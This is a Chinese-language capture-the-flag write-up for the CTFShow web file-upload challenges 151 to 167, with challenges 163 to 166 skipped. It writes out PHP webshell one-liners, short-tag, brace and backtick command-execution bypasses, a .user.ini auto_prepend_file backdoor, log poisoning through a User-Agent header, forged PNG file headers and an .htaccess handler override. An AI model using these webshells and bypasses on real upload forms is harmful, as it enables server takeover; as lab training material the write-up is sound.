CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp

可以使用插件进行post获取flag。

在这里插入图片描述

在这里插入图片描述

ctfshow{ec07a689-3422-439f-aeda-25e174588e7e}

Web152:

考点:后端不能单一校验

就是要传图片格式,抓个包传个png的图片 然后bp抓包修改php后缀解析 然后放包 显示上传成功 蚁剑连即可。

在这里插入图片描述

在这里插入图片描述

ctfshow{3129d70b-491d-411e-811f-b2eafca203c9}

Web153:

考点:后端不能单一校验(黑名单绕过)

.htaccess在绕过文件上传的限制中,通常在 Apache 全局配置文件 httpd.conf
有这样一条配置:AddType application/x-httpd-php .php .phtml或者
SetHandler application/x-httpd-php 将所有文件都解析为 php 文件

这里我们尝试.htaccess(因为它只适用于Apache)所以不行,这里要使用.user.ini
php.iniphp 的一个全局配置文件,对整个 web 服务起作用;而.user.ini.htaccess 一样是目录的配置文件,.user.ini 就是用户自定义的一个 php.ini,通常用这个文件来构造后门和隐藏后门。

这里先上传一个内容为:auto_prepend_file=1.pngpng,然后在正常传一个带图片得一句话木马即可。

这里如果不懂可以参考:.htaccess 和.user.ini 配置文件妙用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ctfshow{dcea4490-2c26-45a6-8027-3c19c8467554}

Web154:

考点:php关键字过滤
这里方法和上面一样传一个1.png(带一句话木马的文件)然后在上传.user.ini 文件即可

<?=eval($\_POST[a]);?>## <?=相当于<?php echo

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

ctfshow{503e93c8-c013-4509-9551-5431a3b5a5ef}

Web155:

这里的方法和上一题一样,ok在做一遍 老样子先上传.user.ini.png1.png然后直接访问/upload/index.php/即可。

在这里插入图片描述
在这里插入图片描述

ctfshow{25d0b333-d5f2-4761-85a0-bed828314b6d}

Web156:

考点:过滤字符[][]可以可以使用{}代替。

这里也很简单 段标签的基础上改成{}即可 <?=eval($_POST{a});?

这里还有个小技巧如果知道flag的位置可以直接使用system()函数执行 查询即可 <?=system("tac ../f*");?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ctfshow{dec5a89b-b30b-49fd-94f3-c4c739292799}

Web157:

考点:过滤字符串 过滤了{};

这里可以使用命令执行:<?=system("tac ../f*");?> 直接访问/upload/

在这里插入图片描述

ctfshow{f7322ad8-f548-4abd-a17b-2e950fa9de2b}

Web158:

同上 一样的方法即可。

在这里插入图片描述

ctfshow{ee9f76b3-2182-4276-904f-5bfaf2afcb8f}

Web159:

这里就不能使用那种上面的方法啦,因为过滤了括号,这里显示上传报错的信息。

这里使用 `` 反引号过滤绕过即可:

<?=`tac ../f\*`?>

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

ctfshow{f84bd0d7-6f86-4de2-bdc9-b51664a4d61c}

Web160:

考点:还是过滤字符串 这里又过滤了log 字符串 所以使用拼接绕过

可以尝试 日志包含绕过 : <?=include"/var/lo"."g/nginx/access.lo"."g"?>

还是先上传.user.ini.png进行解析 然后包含/upload/index.php/ 然后服务器是nginx

知识点:nginx的默认日志路径是:/var/log/nginx/access.log

在这里插入图片描述

直接查看源代码不然太多了日志看不出

在这里插入图片描述
在这里插入图片描述

ctfshow{8fcd0b60-1cfc-4045-b07f-9b36580c8f4f}

Web161:

考点:文件头的校验

文件头校验扩展(这里用gif):

  1. .JPEG;.JPE;.JPG,”JPGGraphic File”
  2. .gif,”GIF 89A”
  3. .zip,”Zip Compressed”
  4. .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”

在这里插入图片描述

在这里插入图片描述

使用16进制编辑器在.user.ini.png 中添加png 文件头 89 50 4E 47 0D 0A 1A 0A 1.png也添加也会成功!!

访问index.php修改User-Agent为:<?php eval($_POST[a]);?> 然后hackbar 或者蚁🗡连接!

在这里插入图片描述

ctfshow{9504ed8b-aebc-4ec0-8f91-45560fc9dc4e}

Web162:

考点:前端校验

Web167:

考点:.htaccess

这回服务器是Aapache2 所以使用.htaccess 写入:AddType application/x-httpd-php.jpg.jpg后缀的文件解析 成php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值